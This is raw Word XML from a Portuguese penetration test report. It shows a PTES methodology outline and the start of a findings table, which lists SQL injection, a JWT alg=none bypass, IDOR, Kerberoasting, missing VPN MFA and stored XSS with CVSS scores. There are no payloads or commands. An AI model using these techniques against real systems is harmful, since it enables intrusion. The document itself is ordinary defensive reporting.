              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BD2D7DC" wp14:editId="12AFFDEC">
                  <wp:extent cx="2857500" cy="1390650"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="729269417" name="Picture 7292694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7500" cy="1390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A9D442D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Crítico    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="EA580C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Alto    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D97706"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Médio    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2563EB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Baixo    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">■ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Info    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4D6B6E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1F492D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Metodologia (PTES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A474B0A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>O engajamento seguiu as sete fases do Penetration Testing Execution Standard (PTES).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16BD0A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04AD08E6" wp14:editId="7D3B21F0">
            <wp:extent cx="5715000" cy="361950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1434613134" name="Picture 14346131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5EEC98" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Interações pré-engajamento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A75364" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Definição de escopo, janelas e regras de engajamento (RoE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19370ACF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Acordo de confidencialidade e canais de comunicação de emergência.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA654C1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Coleta de inteligência</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E5ABC" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OSINT e enumeração passiva de subdomínios (CT logs, DNS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BBCA6B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Fingerprinting de tecnologias, versões e superfícies expostas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5148D5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Modelagem de ameaças</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C63E4AC" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Mapeamento de ativos críticos e fluxos de dados (PII, pagamentos).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F489DC3" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Identificação de atores e cenários de ataque prioritários.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD8FE4F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Análise de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A0E695" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Análise de autenticação, sessão e autorização (IDOR/BOLA).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA9959" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Testes de injeção, configuração de TLS e cabeçalhos de segurança.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E99E685" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D380A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Validação prática (PoC) dos achados de aplicação e rede.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECB8232" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Bypass de autenticação, extração inferencial de dados e XSS armazenado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304E723C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Pós-exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8138DE" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Movimentação lateral e abuso de Kerberos no domínio de teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146F8B05" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Demonstração de impacto encadeado, sem ações destrutivas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163507A6" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B733410" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Consolidação de evidências, classificação de risco e recomendações.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA10B99" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Roteiro de remediação priorizado e reteste sugerido.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646D8DB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FA0F17" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Achados Detalhados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E2E8F0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80"/>
        <w:gridCol w:w="5458"/>
        <w:gridCol w:w="1364"/>
        <w:gridCol w:w="780"/>
        <w:gridCol w:w="1364"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="5809F35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00" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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2221D4C7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2800" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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06EC8D98" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Achado</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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3C00B5A5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Severidade</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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024541FA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="700" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="194FE3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3600CECA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Categoria</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="7C42C33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0C9979E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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0CA4CA9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SQL Injection (boolean/time-based) em /buscar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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BEBB515" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Crítico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C8E9741" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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54D9465" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Aplicação Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="405C3B0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8486E6D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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DC103B7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Bypass de autenticação via JWT com alg=none</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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0B8858E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Crítico</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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1E87F03" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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F5D7B9D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Aplicação Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="382D30F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D518BA2" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C6684A5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>IDOR/BOLA em /api/v1/orders/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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3FB69A8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EA580C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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F114952" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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53688DC" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="0CFF613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8BD6EA5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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64A78C5" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Kerberoasting de conta de serviço (svc_sql)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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2080CB0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EA580C"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Alto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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9DB7DBA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>8.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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4730E7B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Active Directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="559037C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C412BAF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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B35B4F6" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Ausência de MFA no acesso VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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66C19C8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="D97706"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Médio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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C25F462" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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71D2E91" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Rede</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00287A86" w14:paraId="77C5E885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8B8DBF6" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>F-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto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6DB19DA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:color w:val="334155"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Cross-Site Scripting armazenado em avaliações</w:t>
            </w:r>
